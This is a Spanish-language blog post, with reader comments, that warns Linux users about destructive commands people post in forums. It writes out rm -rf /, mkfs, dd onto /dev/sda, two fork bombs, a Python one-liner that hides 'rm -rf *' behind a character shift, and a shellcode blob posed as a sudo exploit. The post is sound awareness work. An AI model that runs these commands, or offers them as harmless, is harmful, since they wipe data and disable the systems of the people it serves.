Comandos maliciosos en Linux

El otro día postearon un anuncio en el foro de Ubuntu advirtiendo de que algunos usuarios estaban incluyendo comandos maliciosos en sus posts, como es un tema que me parece cuanto menos curioso voy a tratar de recopilar algunos de ellos junto con sus (potencialmente peligrosos) efectos:

¡Cuidado! Estos comandos podrían dejar tu sistema inservible, borrar tu disco duro o asustar a tu abuelita, así que será mejor que no los uses.

rm -rf /
rm -rf .
rm -rf *

rm (borrar), -r (recursivo), f (forzar, sin confirmación). Todo un clásico, borrar todo, el directorio actual o todos los ficheros visibles del directorio actual, si ejecutas el primero como root, ¿hasta dónde llegará antes de petar?, creo que me quedaré con la duda…

mkfs
mkfs.ext3
mkfs.lo_que_sea

mkfs (crea un sistema de ficheros). Reformatea lo que viene después del comando creando en su lugar un sistema de ficheros nuevo y limpio.

cualquier_comando > /dev/sda
dd if=algo of=/dev/sda

Esto escribe información en un dispositivo directamente ignorando el sistema de ficheros, que probablemente acabará corrompiéndose.

:(){:|:&};:

Una bomba fork que satura la tabla de procesos del sistema, fácilmente evitable.

Ficheros comprimidos que cuando se descomprimen te inundan el sistema de archivos, te dejan sin espacio en el disco, o te sobreescriben ficheros.

Scripts o programas creados por gente malvada, hay que leer el código fuente de cualquier cosa descargada de una fuente no fiable o cruzar los dedos y encomendarse a Dios mientras se ejecuta (la efectividad de este método no está probada). Como ejemplo, el mensaje en una lista de correo que ofrecía un programilla en C para aprovecharse de un exploit del comando sudo, veamos la parte interesante del mismo:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"
"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"
"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"
"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"
"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"
"x6ex2fx73x68x00x2dx63x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

Esto trozo de código hexadecimal ejecuta un bonito rm -rf ~ / &, borraremos nuestro home y si somos root todo el disco, bonito atrapa script kiddies 😈

Hay que tener cuidado en especial al tocar otros comandos como chmod, chown y chgrp que alteran los permisos, propietario y grupo de los ficheros ya que podríamos conceder acceso a cualquiera o dejar el sistema hecho un desastre si se aplican de forma recursiva sin control.

También recordar que todos estos comandos se pueden ejecutar mediante scripts en lenguajes como python, por ejemplo este código:

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

Ejecuta un rm -rf * oculto tras el “sn!.sg!+”.

Consejos para evitar cargarnos nuestro propio sistema:

  • Aprender los comandos básicos de Linux, si vamos a ejecutar algo mirar qué hace con man.
  • Sólo ejecutar código proporcionado en sitios fiables y aun así mirar qué hace, así aprenderemos, que nunca está de más.
  • Tener un poco de sentido común, si vemos a alguien diciendo “¡Ej3cu74 3st0 y t3ndr4s 4cc3so0 i1im174d0 al ord3n4d0r d3 14 NASA!” no te enfundes tu sombrero de juanker y empieces a copy/pastear.

Eso es todo, Linux es un sistema bastante seguro pero su consola tiene un gran poder, y como ya decía Spiderman, esto debe conllevar una gran responsabilidad por parte del usuario.

Fuente: Ubuntu Forums

21 comentarios

  • los mandatos maliciosos de linux…

    Hoy en día no es nada difícil encontrar una tutoria (llamadas "How to") donde te explican, en pocos pasos, qué es lo que debe hacer para instalar un programa concreto en linux. Muchos de los navegantes, sobre todo novatos, no dudan en ning…

  • Podrias ponerlo en Ubuntu-es como informacion.
    😉

  • […] directorios esenciales o dañar nuestro sistema, entre otras cosillas. En SinConexión realizan una explicación bastante detallada de los abusos más conocidos y dan algunos consejos para evitar cargarnos nuestro sistema; y con […]

  • Gracias por la sugerencia, lo acabo de postear en http://www.ubuntu-es.org/index.php?q=node/71418 , la verdad es que no sigo mucho el foro español y no se si se habrán dado casos de estos (espero que no), pero mejor prevenir que curar 🙂

  • Bueno yo siempre trato de utilizar cuentas de usuario diferentes (con privilegios restringidos) para por ejemplo navegar (abro un navegador como otro usuario) y descargar cosas de internet, o para realizar experimentos y cosas así…, trato de aprovechar al máximo la característica de multiusuario que tiene GNU/Linux, pero vengo notando que desde los Escritorios Libres (sobre todo KDE que es el que utilizo) no se da mucha facilidad o comodidad para abrir programas como otro usuario, con el mínimo de clicks posibles…, es más creo que, lamentablemente, la tendencia ahora es hacer los escritorios monousuario como los viejos Windows, sin mencionar que cada vez abundan mas las molestas ventanitas emergentes que salen por ejemplo al montar un dispositivo, copiar un archivo, etc., y las que bloquean toda una ventana de Konqueror sin importar que tengamos muchas pestañas abiertas…, bueno pero ese es otro tema…

    En cuanto a lo de usar otro usuario (y nunca root) para realizar tareas presumiblemente peligrosas no se si será mas seguro (que alguien lo confirme por favor) pero al menos yo me siento mas seguro…

  • NO HAY COMO PONERLE UN ALIAS AL COMANDO RM

    alias rm “rm -i”

  • nn, Estoy de acuerdo contigo en que el aprovechamiento intensivo del modo multiusuario de GNU/Linux es la solución óptima en lo que a seguridad se refiere, aunque claro, como bien dices esto repercute directamente en la usabilidad.

    Respecto a lo de las ventanas emergentes y otros aspectos sacados de Windows puede que se debiera mejorar el sistema para hacerlo menos intrusivo, como ya ocurrió con la introducción de pestañas en vez de ventanas, lo que no tiene perdón es lo que comentas de que a veces te bloqueen la ventana principal mientras realizas otra tarea, yo uso Gnome y Nautilus, por ejemplo, te deja seguir trabajando pero con la molestia de tener la ventanita de progreso de copia encima.

    El limitar los permisos de los usuarios para ajustarlos a tareas concretas sí me parece seguro cuando vemos que puede existir algún riesgo al ejecutar algo, ejecutar como root cualquier cosa que pida más permisos que nuestro usuario es la solución más rápida y peligrosa.

    Karl McCoy, Es una buena idea lo del alias, pero según veo la opción -f la anula y no pide confirmación, aun así está muy bien para tenerla por defecto.

  • […] escribiendo en ubuntuforums, me acordé de un video que muesta lo que puede pasar si ocupas uno de estos comandos en tu distribucion GNU/Linux favorita, a continuación la muerte de Ubuntu en 2 minutos con 38 […]

  • No son comandos “maliciosos”, son comandos “peligrosos”. Simplemente son comandos que hacen exáctamente lo que se les pide que hagan, y tal y como se les pide que lo hagan. Otra cosa es que lo que hacen es potencialmente peligroso, pero el peligro proviene de un mal uso (a diferencia del verdadero malware, por ejemplo).

    En cuanto al comentario de nn, yo no veo qué dificultad hay en cambiar de usuario constantemente, si se desea. Yo siempre entro a mi escritorio (Xfce) como usuario, y siempre tengo una bendita terminal abierta en una ventana (uso Konsole). Cada vez que quiero hacer algo como root, hago “su -” en la consola y ya está. Si quiero cambiar a “usuario2”, pues “su – usuario2” y ya está. Todos los comandos ajenos a esa terminal siguen siendo comandos ejecutados por el usuario original, pero todos los comandos que llame desde la terminal serán ejecutados por root o por usuario2 o por quien sea.

    Y en cuanto a lo de que haya demasiadas ventanas emergentes, hay dos opciones: desactiva esos servicios (TODO se puede activar y desactivar en cualquier distro Linux), o usa directamente una distro y/o un escritorio que no haga eso. Hay muchos, no solo existe Ubuntu.

  • […] maliciosos en sus posts. Estos códigos pueden hasta dejar inservible tu sistema operativo, en Sin Conexión dejan una explicación detallada de éste tipo de […]

  • […] copy and paste:http://sinconexion.net […]

  • Iñaki Silanes, el título se refiere a ellos como maliciosos porque algunos usuarios los posteaban en Ubuntu Forums con intención de fastidiar a los usuarios novatos, que desconocían su peligro.

    Yo también uso Xfce, en el portátil y sobre Arch Linux, eso sí, la verdad es que cada día me gusta más por lo ligero que es, no descarto migrar el sobremesa en el futuro.

  • No se trata de no usarlos, se trata de saberlos usar!

  • […] Sin conexión.net nos da  una gran explicación al respecto. […]

  • Lo curioso es que deberian informar de esto a todo el mundo.. aunk por desgrcia si la informacion la ponen tan facil cualquier gracoiso con ubuntu delante (en su instituo por ejemplo) y quiera hacer la gracia ya sabe cómo.. que mund mas duro xD

    saludss!!

  • /grunch0, la cosa es lograr que la gente comprenda que no se pueden meter comandos en la consola así tal cual sin pararse a pensar qué hacemos.

    De todas formas con estos, sin ser root, lo máximo que puedes hacer es borrar tu home (también realizable desde el explorador de archivos) o dejar colgado el sistema, cosas que un buen administrador de sistemas debería tener controladas 8)

  • […] el sistema operativo , o cualquier otra calamidad . Aquí pasare a relatar lo explicado en Sin Conexion , que a su vez viene descrito en Ubuntuforums […]

  • po se

  • esos Comandos los puedes ejecutar desde imagenes, jaja., hay se los encargo.. Jw0rmC..

  • […] sobre comandos malicisos en GNU/Linux. Fuente: […]

  • os puedo poner un script bomba fork, si se abre este escrip te colapsa el ordenador y tienes que reiniciarlo por que no te permite hacer nada

    #!/bin/bash
    fork(){
    fork|fork
    }

    fork

    este escrip se puede poner en cualquier fichero y adios a todas las cosas que se esten ejecutando en ese momento y no se han guardado

Escribe un comentario

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

This site uses Akismet to reduce spam. Learn how your comment data is processed.